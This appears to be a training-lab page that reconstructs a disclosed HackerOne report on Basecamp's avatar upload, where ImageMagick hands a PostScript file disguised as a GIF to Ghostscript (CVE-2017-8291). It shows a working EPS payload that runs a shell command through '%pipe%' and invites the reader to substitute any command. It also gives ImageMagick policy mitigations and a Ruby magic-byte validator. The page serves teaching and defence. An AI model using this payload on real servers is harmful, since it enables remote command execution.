Profile & picture
Jason Fried

CEO & Co-founder, Basecamp
Upload a profile picture. Accepted file types: .gif, .jpg, .png — processed by ImageMagick.
Download rce.gif
Attack Flow
1. Click Download rce.gif to get the sample PostScript payload.
2. Edit the file — change echo $FLAG to any shell command.
3. Click Change picture and upload rce.gif.
4. ImageMagick detects the %! magic bytes, calls Ghostscript, CVE-2017-8291 fires, and the shell output is shown below.
Sample EPS Payload (rce.gif)
%!PS
% PostScript/EPS — will be detected by
% ImageMagick and passed to Ghostscript
userdict /setpagedevice undef
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%echo $FLAG) currentdevice putdeviceprops
Mitigation (What Basecamp Fixed)
Disabled the Ghostscript-based PS/EPS/PDF coders in the ImageMagick security policy, so a PostScript file is never delegated to Ghostscript:
<!-- /etc/ImageMagick-6/policy.xml -->
<policy domain="coder" rights="none" pattern="PS" />
<policy domain="coder" rights="none" pattern="EPS" />
<policy domain="coder" rights="none" pattern="PDF" />
Also: validate the file's magic bytes server-side, not just its extension, so a PostScript file renamed to .gif is rejected before ImageMagick ever inspects it.
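As an added example (not Basecamp's code and not part of the original report), the server-side magic-byte check described above, written in Ruby: it accepts an upload only when its leading bytes carry a real GIF, JPEG or PNG signature that agrees with the extension, so a PostScript file saved as rce.gif is rejected before it reaches ImageMagick. The function and constant names are my own; the sample inputs are constructed.

```ruby
# Added example: reject uploads whose content does not match an allowed
# image signature, regardless of the extension the client supplied.
# The signatures are the real file-format magic bytes; inputs below are constructed.

ALLOWED_SIGNATURES = {
  "gif"  => ["GIF87a".b, "GIF89a".b],
  "jpeg" => ["\xFF\xD8\xFF".b],
  "png"  => ["\x89PNG\r\n\x1A\n".b],
}.freeze

EXT_TO_TYPE = { ".gif" => "gif", ".jpg" => "jpeg", ".jpeg" => "jpeg", ".png" => "png" }.freeze

# Returns the detected image type ("gif", "jpeg", "png") or nil.
# Only the leading bytes are inspected, so a file starting with "%!PS"
# is never matched even though ImageMagick itself would sniff it as PostScript.
def detect_image_type(bytes)
  head = bytes.b[0, 8]
  ALLOWED_SIGNATURES.each do |type, sigs|
    return type if sigs.any? { |sig| head.start_with?(sig) }
  end
  nil
end

# Decide whether an upload may be handed to the image pipeline.
# Returns [accepted, reason]: the extension must be on the allow-list,
# the content must carry an allowed signature, and the two must agree.
def validate_upload(filename, bytes)
  ext = File.extname(filename).downcase
  claimed = EXT_TO_TYPE[ext]
  return [false, "extension not allowed"] unless claimed
  actual = detect_image_type(bytes)
  return [false, "content is not a GIF/JPEG/PNG"] unless actual
  return [false, "extension #{ext} does not match #{actual} content"] unless actual == claimed
  [true, actual]
end

# Constructed samples: a minimal GIF header, and PostScript magic bytes
# stored under a .gif name, as in the attack flow above.
REAL_GIF  = "GIF89a\x01\x00\x01\x00".b
PS_AS_GIF = "%!PS\n% PostScript disguised as an image\n".b

if __FILE__ == $0
  p validate_upload("avatar.gif", REAL_GIF)  # => [true, "gif"]
  p validate_upload("rce.gif", PS_AS_GIF)    # => [false, "content is not a GIF/JPEG/PNG"]
  p validate_upload("photo.png", REAL_GIF)   # => [false, "extension .png does not match gif content"]
end
```

Run this check before the file is written anywhere ImageMagick can read it; the policy.xml entries above remain the backstop for anything the signature check cannot classify.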
HackerOne Report
Reporter: gammarex
Severity: Critical (9–10)
Bounty: $5,000
Reported: Jun 13, 2018
Disclosed: Nov 26, 2020
Program: Basecamp